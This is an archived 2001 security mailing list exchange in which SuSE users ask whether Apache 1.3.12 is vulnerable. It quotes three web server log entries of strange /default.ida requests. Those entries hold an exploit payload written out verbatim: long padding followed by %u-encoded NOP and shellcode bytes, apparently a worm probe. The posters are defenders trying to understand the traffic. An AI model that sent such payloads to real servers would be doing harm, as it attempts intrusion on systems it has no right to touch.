Mailinglist Archive: opensuse-security (343 mails)

< Previous Next >
Re: [suse-security] Strange HTTP requests
  • From: michael.ryan@xxxxxxxx
  • Date: Thu, 19 Jul 2001 22:02:17 +0100
  • Message-id: <OFB042B5E4.A73E9BB0-ON80256A8E.00725935@xxxxxxxx>


... on the same thread ... are there any known exploits/vulnerabilities for
Apache 1.3.12 running on SuSE?
(The only issue I found on
http://www.suse.com/us/support/security/index.html was dated 07-09-2000 and
just required a minor edit to httpd.conf)
should I upgrade to 1.3.19 anyway?

TIA
Michael




Lars Trebing
<ltrebing@ltr To: SuSE Security Mailing List <suse-security@xxxxxxxx>
ebing.de> cc:
Subject: [suse-security] Strange HTTP requests
07/19/2001
07:46 PM






Hello everyone,

My Apache has just got three strange requests from three different
addresses:

63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315
209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315
161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315

Might this perhaps be an attack for a known bug of some HTTP server?
Should I maybe even worry about this? (I am running Apache 1.3.12).

By the way, I performed the same request locally and got a 404 error
instead of the 400s reported in the log.

TIA, Lars

--
To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
For additional commands, e-mail: suse-security-help@xxxxxxxx





< Previous Next >
Follow Ups